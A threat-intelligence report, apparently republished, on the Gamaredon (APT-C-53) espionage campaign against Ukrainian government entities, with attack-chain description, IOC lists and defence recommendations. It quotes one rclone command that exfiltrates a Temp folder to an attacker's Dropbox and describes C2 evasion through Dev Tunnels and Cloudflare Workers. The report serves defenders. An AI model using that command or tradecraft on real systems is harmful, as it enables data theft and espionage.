APT-C-53 (Gamaredon): Attack Campaign Targeting Ukrainian Government Entities

Executive Summary

The Russian state-sponsored threat group APT-C-53 (Gamaredon), active since 2013, continues its espionage operations against Ukrainian governmental and military institutions.

In 2025, its campaigns have evolved to include dynamic migration of command-and-control (C2) infrastructures to legitimate cloud services (Microsoft Dev Tunnels, Cloudflare Workers) and the use of advanced obfuscation techniques to bypass detection.

The attack chain relies on stealthy PowerShell and VBScript payloads, registry-based persistence, and Dropbox as a data exfiltration channel.
Indicators of Compromise (IOCs) include multiple C2 domains, disposable Cloudflare subdomains, and several MD5 file hashes.

Primary source: 360 Threat Intelligence Center (360高级威胁研究院).
Secondary source: republication via CN-SEC.com.

Background

Gamaredon, also known as Primitive Bear, Winterflounder, and BlueAlpha, has consistently targeted Ukraine with intelligence-gathering and espionage campaigns for over a decade.
Researchers from the 360 Threat Intelligence Center observed in September 2025 a new wave of activity, marked by the abuse of trusted cloud services to disguise malicious infrastructures and exfiltration channels.

Tactics and Techniques

1. Dynamic C2 Migration

• Initial infrastructure hosted on platforms such as Telegram Telegraph.
• Transition to Microsoft Dev Tunnels, generating temporary subdomains under *.devtunnels.ms with valid TLS certificates issued by Microsoft.
• Use of White-listed Domain Camouflage, embedding trusted domains (e.g., wise.com, megamarket.ua) in URLs to mislead security controls.

Attacker advantages:

• Real C2 IP addresses hidden behind Microsoft relays.
• Subdomain rotation capability in minutes to hours.
• Malicious traffic blended with legitimate HTTPS traffic.

2. Abuse of Cloud Services for Payload Delivery

• Cloudflare Workers leveraged to deliver malware.
• Automated generation of short-lived subdomains (≤ 48 hours).
• Two-stage delivery process:
  • Stage 1: payload delivery through rotating Cloudflare Workers subdomains.
  • Stage 2: execution of a VBScript dropped into %TEMP% with randomized names (tmpXXXX.tmp.vbs).

3. Persistence and Stealth Execution

• Registry-based persistence: HKCU:\System\*.
• Dynamic PowerShell compilation to evade static detection.
• Temporary files disguised as Microsoft Office artifacts (%localappdata%\Winwordini.DAT) used as staging areas before exfiltration.

4. Data Exfiltration

• Use of rclone.exe to synchronize stolen data with an attacker-controlled Dropbox repository.
• Example command: rclone.exe copy %UserProfile%\AppData\Local\Temp\1750756392913 dropbox:DP27-KA-000422_585516477/
• Encrypted transfers leveraging Dropbox’s trusted infrastructure to evade traffic inspection.

Attribution

The following factors support attribution to APT-C-53 (Gamaredon):

• Reuse of known infrastructure and techniques.
• Documented reliance on domain shadowing and cloud service abuse.
• Persistent focus on Ukrainian government institutions.
• Infrastructure ties to Russian domains (.ru).

---

Indicators of Compromise (IOCs)

C2 Domains and Malicious Relays

litanq[.]ru
fulagam[.]ru
bulam[.]ru
*.euw.devtunnels[.]ms
dvofiuao.3150wild.workers[.]dev
tskqbu.bronzevere.workers[.]dev
bdslmtlqh.bronzevere.workers[.]dev
jqrwbrbj.bronzevere.workers[.]dev
khycpsgbu.previoussusanna.workers[.]dev
oexvrm.embarrassed3627.workers[.]dev
xuwj.goldjan.workers[.]dev
gohiz.griercrimson.workers[.]dev

MD5 Hashes

98b540aeb2e2350f74ad36ddb4d3f66f
0459531e3cbc84ede6a1a75846a87495
f3deebe705478ec1a4ec5538ac3669cb
67896b57a4dcf614fb22283c130ab78b
d2c551812c751332b74b0517e76909f2
9258a427c782cd8d7dcf25dc0d661239
023429e53d32fa29e4c7060c8f3d37db

Defense Recommendations

• Email security hardening: advanced filtering to block malicious attachments (LNK, archives).
• System and registry monitoring: track suspicious entries in HKCU:\System and monitor PowerShell logs.
• Endpoint security: deploy and maintain EDR capable of detecting fileless malware.
• Network surveillance: monitor anomalous traffic to Dev Tunnels and Cloudflare Workers.
• Control third-party tool usage: restrict unauthorized use of rclone.exe for data transfers.

Sources

• Primary source: 360 Threat Intelligence Center – report published on September 7, 2025.
• Secondary source: republication via CN-SEC.com. https://cn-sec.com/archives/4411359.html

Key points about the sources used:

CN-SEC.com is a Chinese website that serves as a community platform for cybersecurity threat intelligence. It features:

• translations or republications of technical articles from other sources (research blogs, vendor bulletins, threat intelligence team publications),
• original analyses written by Chinese researchers,
• contributions from local offensive and defensive security communities.

It is therefore primarily an aggregator and relay of technical content, widely followed in Asia, but not necessarily the primary source of the reports. In our case, the article on APT-C-53 (Gamaredon) is in fact a republication of an analysis originally produced by the 360 Threat Intelligence Center (360高级威胁研究院), the advanced research unit of Qihoo 360, a major player in cybersecurity in China.

In summary on source qualification:

• CN-SEC.com = Chinese security-oriented community site that republishes or centralizes technical content.
• Primary source = 360 Threat Intelligence Center, which published this analysis on September 7, 2025, on its official account (WeChat / blog).